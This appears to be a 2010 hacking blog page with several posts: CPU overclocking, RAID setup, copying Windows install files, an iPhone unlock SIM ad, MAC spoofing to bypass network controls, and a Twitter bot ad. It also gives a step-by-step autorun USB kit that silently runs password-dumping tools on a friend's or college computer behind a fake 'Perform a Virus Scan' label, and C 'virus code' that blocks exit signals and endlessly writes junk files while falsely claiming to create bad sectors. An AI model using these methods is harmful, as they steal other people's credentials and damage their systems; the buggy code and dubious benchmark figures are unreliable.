Showing posts with label Hardware Hacks. Show all posts
Showing posts with label Hardware Hacks. Show all posts

Tuesday, 14 December 2010

Which CPU's Can Be Hacked | How To hack A CPU

Know which CPUs can be hacked or overclocked.
With this brief look at the evolution of CPUs, you'll quickly see who makes the most hackable CPU. Armed with positive CPU identification and knowing what you want to accomplish in terms of performance, you'll be able to determine if your present CPU can be hacked or if you need a new CPU to gain better performance.
AMD CPUs are typically deemed more hackable than Intel CPUs as there are usually more system boards for AMD CPUs that provide the option to adjust the base clock speed and clock multiplierand Intel has typically locked down their CPUs to function at only one or a few clock multiplier settings, and they have usually rated and sold most of their CPUs at the highest speed they can be reliably be run. Table provides a quick overview of the most hackable CPU types and methods. Most CPUs can be overclocked by changing the base clock frequency, while some allow multiplier changes. In the case of a number of AMD and a few Intel CPUs, the chip can be modified to support overclocking.
Overclocking methods by CPU type
CPU
Overclocking options
Overclocking method
AMD Athlon
FSB clock, multiplier
Jumpers, BIOS, chip mod
AMD Duron
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Celeron
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Pentium I
FSB clock, multiplier
Jumpers, BIOS
Intel Pentium II (pre-8/98)
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Pentium II (post-8/98)
FSB clock
Jumpers, BIOS
Intel Pentium III
FSB clock
Jumpers, BIOS
Intel Pentium 4
FSB clock
Jumpers, BIOS

The most significant limiting factors in overclocking potential are the features of the system board. As the Front Side Bus (FSB) speed is increased, the PCI and AGP bus speeds are also increased. So if the clock settings alter the FSB and PCI/AGP speeds in proportion to each other, you may reach the speed limit of the system components before you reach the limits of your CPU. If your system board features provide a variety of FSB speeds with separate PCI/AGP speed options, you can likely increase the CPU speed by 100% and still maintain reliable PCI/AGP bus speeds. The available clock setting options vary from system board to system board, even across boards from the same manufacturer.
According to http://www.sysopt.com, one of the most popular CPU analysis and overclocking sites, which collect data from dozens of real-world users who thrive on overclocking, the most overclockable CPUs are:
  • AMD Thunderbird
  • Pentium III Coppermine
  • Pentium 4
  • AMD Duron
Perhaps Intel saw the light in trying to recapture hobbyist market share and decided not to limit the overclockability of the Pentium III and 4 CPUs, a departure from their earlier restrictions on some Pentium II and Celerons chips. Do not let the lack of being able to change the multiplier values for Intel CPUs fool you into thinking they cannot run faster than rated speeds; most do run faster and quite well. While considering CPUs, you have to consider the most popular system boards for overclocking. According to http://www.sysopt.com, the top four overclockable system boards are:
  • Asus Tek
  • Abit
  • MicroStar
  • Epox

Intel CPUs

Relatively few Intel CPUs can be hacked because it's not in Intel's best interest to sell lower performance chips that can be made to perform like their higher performance versions. Some Intel CPUs perform better under overclocking conditions than others. Table lists the most hackable CPUs based on end-user reports from http://www.sysopt.com.
Hackable Intel CPUs
Processor
Published speed
Achieved speed
Percent increase
Pentium 4
3.1 GHz
5.0 GHz
+ 163%
Pentium 4
2.7 GHz
3.4 GHz
+ 25%
Celeron II
2.0 GHz
2.9 GHz
+ 45%
Pentium III Tualatin
450 MHz
1.2 GHz
+ 166%
Pentium II
400 MHz
2.6 GHz
+ 550%

While these performance gains are impressive, the claims by users who have achieved these speeds were not accompanied by how-to tips. Intel CPUs can be two to five times more expensive than comparable AMD CPUs, and hacking these CPUs and the system boards that support them is not well documented.

AMD CPUs

AMD CPUs are generally more overclockable than Intel's, with more parameter flexibility in the BIOS, for three reasons:
  • The manufacturers of boards that use AMD processors and related chipsets tend to use the hackable Award BIOS.
  • Available "white box" system boards are more hackable.
  • The flexibility of AMD processors accepts higher clock speeds and various clock-multiplier values.
Intel carries the majority of the CPU and the system board market with reputable OEMs whose products generally use restricted versions of Phoenix BIOS. By contrast, AMD reaches out to a different market that includes AMD for CPUs, Via for supporting chipsets, and Phoenix's Award BIOS division with significant parameter flexibility.
Tweaking AMD CPUs yields impressive results, as seen in the data from http://www.sysopt.com in Table, feeding the myth that many slower CPU chips are really higher speed devices that failed high-speed tests, were marked as slower speed devices, and were undersold.
Most hackable AMD CPUs and performance increases
Processor
Published speed
Achieved speed
Percent increase
Athlon MP
1.8 GHz
2.7 GHz
+ 50%
Athlon Thunderbird
1.7 GHz
2.4 GHz
+ 41%
Athlon Thunderbird
1.5 GHz
2.3 GHz
+ 53%
Athlon MP
1.5 GHz
2.1 GHz
+ 40%
Athlon MP
500 MHz
1.8 GHz
+ 260%

As with disclaimers for just about everything else, "your mileage may vary"—and it will—because the various combinations of CPU, chipset, BIOS, and system board design all yield different results. The distribution of overclockable CPUs for retail or online is not predictable; the plant where the chips are made may have had an excess of fast chips and a backlog of orders for slower ones and simply relabeled and shipped the faster CPUs to meet business needs or some monthly shipment quota.

Speedup Your HDD With Raid


If one fast drive is good, then five working together is surely better.
Redundant Array of Inexpensive Disks (RAID) technology has been a significant lifesaver and performance boost for file servers. RAID can be set up in different configurations to provide systems with fault-tolerance or performance enhancements that are crucial to keeping data safe. It can be applied to personal desktop systems to provide significant disk drive performance enhancement.

RAID-0 (zero) is the most basic and highest performing RAID configuration. Portions of data normally stored on one disk drive are spread out across multiple drives, and those drives are accessed in parallel to deliver the data faster, because each drive does not have to access all of the data before it can be delivered. RAID-0 is unfortunately and by nature the least reliable in terms of data integrity, because a failure in any single drive renders all of the data useless.

In contrast to RAID-0, in a RAID-1 configuration all of the data is stored equally on two drives, in parallel. This slows the storage and reading performance but almost guarantees that the data remains intact even if one of the drives fails.

RAID-5
is somewhat a mix of RAID-0 and RAID-1, striping data across multiple drives but also adding error correction information across the drives, providing the advantages of parallel drives and a high degree of ability to recover data if one drive should fail.

Another hybrid implementation of RAID that is very affordable and intended for desktop system is RAID-0+1. The Promise Technology (http://www.promise.com) FastTrak TX4000 RAID controller card is specifically meant for desktop users with an appetite for high-performance disk systems. Performance enhancements of up to 30% are possible. Upgrading with top-performing disk drives and putting them into a RAID configuration just might knock the dust bunnies out of your keyboard.

The basic steps to install a RAID configuration on your PC are listed below. Be aware that the specific steps will be unique to the RAID controller (system board or add-in card type), your system BIOS, and RAID configuration software. After installation, the RAID configuration should appear to your operating system as a single-disk volume.

You need a RAID controller or RAID capabilities built into your system board. Promise Technologies is one of the most popular brands of add-in RAID controllers for IDE drives.

Have at least two identical disk drives on hand for RAID-0 and 1. Configuration of a simple RAID is a lot easier if the drives are identical: there will be no wasted space, and they should mirror each other and perform equally well. RAID 0+1 will require at least four disks.

If necessary, make a bootable DOS diskette with any necessary drivers or configuration program for your RAID controller. For BIOS-based RAID setups, familiarize yourself with the RAID setup screens and options in BIOS. It is likely you will have to connect the RAID drives to different IDE connections than the normal non-RAID IDE interfaces.

With the system powered down, install and connect the drives to the RAID controller interface connectors.

Start the system and either boot with the DOS diskette containing the RAID controller configuration program or get into the BIOS setup to access the RAID configuration screens.

Select the type of RAID you will be creating—typically 0, 1, or 0+1.

Partition the drives with the configuration program or BIOS screens. This process establishes how the RAID controller views and uses the drives.

When RAID controller configuration and disk partitioning is complete, you will either FORMAT the drives under DOS or start the installation of your operating system onto the new RAID system as the primary boot drive.

(RAID 1 and higher only) To test your configuration after installing your operating system, shut down and disconnect one of the RAID drives, then restart to verify that indeed the RAID system actually mirrors data to one of the drives.

Speedup Operating System Installation And Maintainance

Save yourself time by making Windows installation files available on your hard drive.

We know you've had this problem: you install a new mouse, change a network setting, do almost anything that upsets the delicate balance in Windows and you're prompted to insert the Windows so-and-so CD. Where is it? Did you grab the right one?

If you have a lot of free disk space (about 700 MB), take a cue from the major PC makers and copy the files from your Windows CD to your hard drive. In fact, it's not a bad idea to copy the files before you install Windows so the resulting installation automatically knows where to find the files later—thus no prompting to insert a CD later.


PC manufacturers have typically placed the Windows 95, 98, 98SE, and Me files in a C:\WINDOWS\OPTIONS\CABS folder, and Windows NT, 2000 or XP files into C:\i386.

You can emulate this pattern for Windows 9x-Me by creating these folders on your hard drive from a DOS prompt, then copying the files from the CD (assuming this is drive D:) as follows, from the A:\> DOS prompt:

A:\>C:

C:\>MD WINDOWS C:\>MD

\WINDOWS\OPTIONS C:\>MD

\WINDOWS\OPTIONS\CABS C:\>CD

\WINDOWS\OPTIONS\CABS C:\

\WINDOWS\OPTIONS\CABS>COPY

D:\WIN98\*.*


Start the Windows installation from this folder by typing:

C:\ \WINDOWS\OPTIONS\CABS>SETUP

For Windows NT-XP:

A:\>C: C:\>MD

i386 C:\>CD i386

C:\I386>COPY D:\i386\*.*


Start the Windows installation from this folder by running this command:

C:\I386>WINNT


The next time Windows needs a file from the installation CD it will automatically look in the appropriate folder, copy the file, and move on.

Unlock Your Iphone Instantly

How many gadgets freak do you know who are not interested to own an iPhone. I do not think there are any. Apple iPhone especially the iPhone 3G has created a rage among gadget savvy as well as normal users. It is not only a mobile but a personal entertainment device on the go. But not every one is lucky to use an iPhone like those in US or Europe. This is because firstly till date iPhone has not been released worldwide and secondly iPhone is not sold over the counter in a gadget shop rather it is sold along with a mobile service. So even if it is released in your country you do not have the option to use it along with your favorite carrier and the carrier which provides iPhone charge an extremely non-affordable plan (outside US). For example an 8GB iPhone comes with a price tag of approximately INR 30,000 from Airtel and almost same from Vodafone in India. However the same phone in US from AT&T is available for approx USD 199.



To avoid this discrepancies and to make the iPhone accessible by general public the concept of unlocking iPhone came out. So let me tell about what exactly is unlocking or an unlocked iPhone. Unlocking lets you place calls with any GSM carrier by inserting different Subscriber Identity Modules (SIMs) into the phone. Normally these SIMs from unapproved carriers won’t work. When your iPhone is unlocked, just buy a local GSM-compatible SIM, place it in your phone, and make your calls. Most phones in the US are “locked” to a particular network. In the iPhone’s case, that’s AT&T for the US, O2 for Great Britain, and so on. Should you want to use your iPhone with another GSM carrier, you need to unlock.



When Apple released the latest 2.1.1 version of the iPhone firmware it is no longer possible to unlock iPhone via software. But there are iPhone unlocking service providers which provides very reliable unlocking service. The method is thoroughly tested with SIMs from various countries and it is working fine without any hassle. So how does this method work?

The 3G iPhone unlock solution is a hardware unlock solution in the form of a ‘piggy back sim’. This hardware unlock solution is a plug and play solution that will instantly unlock your 3G iPhone. The 3G iPhone Unlock SIM is a super thin ( 0,01 mm.) sim card that slides over the sim card of the carrier that you want to use. It basically “fools” the iPhone into thinking that the original SIM is inserted.

The 3G Unlock SIM unlock sim card will not make any changes to the iPhone software. Its a simple plug and play solution. Just slide the 3G unlock sim on top of your existing carrier sim, and your 3G iPhone will be fully unlocked with all functions working. The main benefit of a hardware unlock solution is so you will not loose any warranty at all.

For more information and demo videos about this unlocking service, you can head over to iPhone 3G unlocking website.

Monday, 13 December 2010

How To Spoof Your MAC Address Usin SMAC


  1. Download the SMAC tool from www.klcconsulting.net/smac/.

  2. Unzip the program into its default directory.

  3. Start the program from the Windows Start, Programs menu.

  4. Open a DOS prompt and type ipconfig /all. Record your MAC address here: ___________

  5. Now use the SMAC program to change your MAC address. If you would like to change your MAC to a specific value, you could sniff it from the network or you could the table at http://standards.ieee.org/regauth/oui/index.shtml to research specific Organizational Unique Identifiers (OUIs) at the IEEE website.

  6. Once you have determined what to use for a new MAC address, enter it into the SMAC program; then save the value and exit.

  7. Finally reboot the system and perform the ipconfog /all command from the DOS prompt. Record the MAC address here and compare to the results in step 4. _________

    You should see that the two MAC addresses are different. This is a value that can be used to demonstrate the trivial process of MAC spoofing and can be used to bypass controls that lock down networks to systems that have an approved MAC address.

N thus, v r done with it. Hopes u enjoy The step wise step tut.

ANy comment or query, do write as usual. 

Enjoy Hacking Enjoy Hackton

Hack Twitter With Twitter Bot

Twitter is becoming an important marketing tool for online publishers and marketers. But it can be time consuming to keep your profile up to date and it often gets forgotten. I guess Everybody is waiting for a Solution. So Today I will give you a software which will automate all your twitter tasks.
Twitter Bot can do a lot of amazing things without any need of User Intervention thats why it is called a Bot. Why one should have this software? I would say checkout the functions of this software and you will get your answer.

Features

1. Auto add followers: The twitter bot will add 500 new friends on a daily basis. Many of those follower may follow you in return.
2. Auto Unfollow those who are not following you: It will automatically unfollow those who are not following you.
3. Auto Follow those who follow you: You can return favor to your followers by following them and that by a click of a button
4. Follow Top 100 People from your Country: You can target users from a particular Country based on Time Zones
5. Auto Follow By Keyword Search: You can target user based on Specific Keywords.
6. Auto Update your status: You can update your status every X minutes and these Updates will be fetched from a Text File.
7. Auto reply: You can set a Message which will be replied automatically on arrival of a message.
8. Multiple accounts handling: You can handle multiple Accounts. Twitter Bot can handle all of them in the background doing all the functions.
9. Works with proxies or Real IP: The twitter bot can run behind proxies. You set a text file with a list of proxies in format IP:Port (ex. 123.123.123.123:80) and the twitter bot will first check to see which of them are working, and then it will use the working ones to login to your accounts and do the functions that you neet it to do.
10. Extract and import your followers: You can extract the list of followers into XML or Text file.
11. Schedule Messages: You can schedule the Bot to Update your Twitter status on a Specified Date and Time.
12. Reply based on Keywords: You can set the Bot to reply based on the Keyword found in arrived Message.

Conclusion

After mentioning all these features I don’t need to say much about this Software. I would say just go and grab this software.

Download

To get your copy of Twitter Bot Click Here

Steal Your Friend's Password With USB Drive


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.
 

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Virus Code To Damage A HArd Disk - How To damage A Hard Disk

#include
#include
#include
#include
#include
#include
#include


#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}